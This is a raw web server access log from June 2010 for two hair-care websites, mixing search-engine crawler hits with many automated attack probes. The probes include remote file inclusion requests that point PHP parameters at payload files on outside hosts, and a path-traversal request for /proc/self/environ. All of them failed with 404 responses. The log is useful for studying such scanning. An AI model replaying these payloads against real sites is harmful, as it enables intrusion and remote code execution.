77.88.25.28 - - [07/Jun/2010:15:18:08 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15023 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [07/Jun/2010:15:18:16 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14974 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
92.241.190.214 - - [07/Jun/2010:15:23:48 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://yourbestdate.info/xml/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
67.195.111.39 - - [07/Jun/2010:15:26:06 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
67.195.111.39 - - [07/Jun/2010:15:26:06 -0700] "GET /logs/ HTTP/1.0" 200 5784 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
208.115.111.245 - - [07/Jun/2010:15:29:09 -0700] "GET /?N=D HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [07/Jun/2010:15:29:13 -0700] "GET /tmp/?D=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [07/Jun/2010:15:29:18 -0700] "GET /tmp/?M=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [07/Jun/2010:15:29:23 -0700] "GET /tmp/?N=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [07/Jun/2010:15:29:27 -0700] "GET /tmp/?S=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [07/Jun/2010:15:29:30 -0700] "GET /?N=D HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [07/Jun/2010:15:29:35 -0700] "GET /tmp/?D=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [07/Jun/2010:15:29:39 -0700] "GET /tmp/?M=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [07/Jun/2010:15:29:44 -0700] "GET /tmp/?N=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [07/Jun/2010:15:29:49 -0700] "GET /tmp/?S=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
77.88.25.28 - - [07/Jun/2010:15:29:57 -0700] "GET /freehairsecretsphp/viewtopic.php?p=1145 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
72.52.150.147 - - [07/Jun/2010:15:31:28 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://worthfastpitch.com/xml/.log? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.freehairsecrets.com"
72.52.150.147 - - [07/Jun/2010:15:31:28 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://worthfastpitch.com/xml/.log? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.freehairsecrets.com"
72.52.150.147 - - [07/Jun/2010:15:31:28 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://worthfastpitch.com/xml/.log? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.freehairsecrets.com"
80.191.144.4 - - [07/Jun/2010:15:32:10 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.stjohns-laporte.com/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.191.144.4 - - [07/Jun/2010:15:32:10 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.stjohns-laporte.com/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.191.144.4 - - [07/Jun/2010:15:32:10 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.stjohns-laporte.com/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [07/Jun/2010:15:32:30 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14530 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
80.191.144.4 - - [07/Jun/2010:15:36:37 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.stjohns-laporte.com/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.191.144.4 - - [07/Jun/2010:15:36:37 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.stjohns-laporte.com/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.191.144.4 - - [07/Jun/2010:15:36:37 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.stjohns-laporte.com/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.191.144.4 - - [07/Jun/2010:15:36:47 -0700] "GET /logs/access_100222.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.stjohns-laporte.com/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.37.176 - - [07/Jun/2010:15:38:16 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [07/Jun/2010:15:38:18 -0700] "GET /freehairsecretsphp/viewtopic.php?p=8734 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
204.236.211.159 - - [07/Jun/2010:15:43:26 -0700] "GET /logs/access.log HTTP/1.1" 200 381501 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" "growlonghairfast.com"
77.88.25.28 - - [07/Jun/2010:15:45:54 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15300 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
80.69.71.142 - - [07/Jun/2010:15:50:58 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
80.69.71.142 - - [07/Jun/2010:15:50:58 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
80.69.71.142 - - [07/Jun/2010:15:50:58 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.88.25.28 - - [07/Jun/2010:15:51:07 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12848 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [07/Jun/2010:15:57:06 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13769 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [07/Jun/2010:15:59:54 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14192 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [07/Jun/2010:16:04:14 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13750 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [07/Jun/2010:16:09:38 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15068 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [07/Jun/2010:16:15:25 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15176 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
119.235.237.86 - - [07/Jun/2010:16:17:49 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12901 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "growlonghairfast.com"
67.195.37.176 - - [07/Jun/2010:16:17:55 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15103 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
77.88.25.28 - - [07/Jun/2010:16:24:44 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14378 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [07/Jun/2010:16:28:08 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12825 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
208.115.111.248 - - [07/Jun/2010:16:28:08 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
72.37.150.18 - - [07/Jun/2010:16:29:36 -0700] "GET /logs/access_100301.log%20%20//delete_comment.php?board_skin_path=http://ecohearth.com/tmp/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.37.150.18 - - [07/Jun/2010:16:29:36 -0700] "GET /logs//delete_comment.php?board_skin_path=http://ecohearth.com/tmp/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.37.150.18 - - [07/Jun/2010:16:29:36 -0700] "GET /delete_comment.php?board_skin_path=http://ecohearth.com/tmp/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.37.150.18 - - [07/Jun/2010:16:29:56 -0700] "GET /delete_comment.php?board_skin_path=http://ecohearth.com/tmp/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.37.150.18 - - [07/Jun/2010:16:29:56 -0700] "GET /logs/access_100301.log%20%20//delete_comment.php?board_skin_path=http://ecohearth.com/tmp/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.37.150.18 - - [07/Jun/2010:16:29:56 -0700] "GET /logs//delete_comment.php?board_skin_path=http://ecohearth.com/tmp/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:30:10 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:30:10 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:30:10 -0700] "GET /logs/access_100222.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:30:32 -0700] "GET /logs/access_100201.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:31:49 -0700] "GET /logs/access_100222.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:31:49 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:31:49 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:31:57 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:31:57 -0700] "GET /logs/access_100222.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:31:57 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:32:14 -0700] "GET /logs/access_100201.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:32:26 -0700] "GET /logs/access_100201.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:32:29 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:32:29 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:32:29 -0700] "GET /logs/access_100222.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:32:53 -0700] "GET /logs/access_100201.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
59.42.10.71 - - [07/Jun/2010:16:34:46 -0700] "GET /include/bbs.lib.inc.php?site_path=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.250.57.232 - - [07/Jun/2010:16:35:43 -0700] "GET /logs/access_100607.log HTTP/1.0" 200 3708257 "-" "Wget/1.11.4" "www.freehairsecrets.com"
59.42.10.71 - - [07/Jun/2010:16:36:17 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
59.42.10.71 - - [07/Jun/2010:16:36:17 -0700] "GET /logs/access_100301.log%20%20//include/bbs.lib.inc.php?site_path=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [07/Jun/2010:16:36:43 -0700] "GET /freehairsecretsphp/viewtopic.php?p=1947 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
59.42.10.71 - - [07/Jun/2010:16:37:04 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
59.42.10.71 - - [07/Jun/2010:16:37:04 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
59.42.10.71 - - [07/Jun/2010:16:37:04 -0700] "GET /include/bbs.lib.inc.php?site_path=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.250.57.232 - - [07/Jun/2010:16:37:23 -0700] "GET /logs/access_100607.log HTTP/1.0" 200 3708257 "-" "Wget/1.11.4" "growlonghairfast.com"
72.37.150.18 - - [07/Jun/2010:16:37:50 -0700] "GET /delete_comment.php?board_skin_path=http://ecohearth.com/tmp/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.37.150.18 - - [07/Jun/2010:16:37:50 -0700] "GET /logs//delete_comment.php?board_skin_path=http://ecohearth.com/tmp/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.37.150.18 - - [07/Jun/2010:16:37:50 -0700] "GET /logs/access_100222.log%20%20//delete_comment.php?board_skin_path=http://ecohearth.com/tmp/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:38:36 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:38:36 -0700] "GET /logs/access_100125.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:38:36 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.37.150.18 - - [07/Jun/2010:16:38:43 -0700] "GET /logs//delete_comment.php?board_skin_path=http://ecohearth.com/tmp/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.37.150.18 - - [07/Jun/2010:16:38:43 -0700] "GET /delete_comment.php?board_skin_path=http://ecohearth.com/tmp/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.37.150.18 - - [07/Jun/2010:16:38:43 -0700] "GET /logs/access_100222.log%20%20//delete_comment.php?board_skin_path=http://ecohearth.com/tmp/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.249.65.235 - - [07/Jun/2010:16:40:16 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
77.88.25.28 - - [07/Jun/2010:16:41:20 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5044 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:41:50 -0700] "GET /logs/access_100222.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:41:54 -0700] "GET /logs/access_100201.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:42:42 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:42:42 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:42:42 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:42:42 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:42:42 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:42:42 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
59.42.10.71 - - [07/Jun/2010:16:42:58 -0700] "GET /logs/access.log%20%20//include/bbs.lib.inc.php?site_path=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
59.42.10.71 - - [07/Jun/2010:16:42:58 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
59.42.10.71 - - [07/Jun/2010:16:42:58 -0700] "GET /include/bbs.lib.inc.php?site_path=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:43:00 -0700] "GET /logs/access_100222.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:43:05 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:43:05 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:43:05 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:43:05 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:43:05 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:43:05 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.37.150.18 - - [07/Jun/2010:16:43:06 -0700] "GET /logs/access_100301.log//delete_comment.php?board_skin_path=http://ecohearth.com/tmp/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:43:07 -0700] "GET /logs/access_100222.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:43:10 -0700] "GET /logs/access_100201.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:43:11 -0700] "GET /logs/access_100201.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:43:32 -0700] "GET /logs/access_100222.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:43:32 -0700] "GET /logs/access_100201.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.208.34.38 - - [07/Jun/2010:16:45:04 -0700] "GET /skin/zero_vote/error.php?dir=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.208.34.38 - - [07/Jun/2010:16:45:04 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
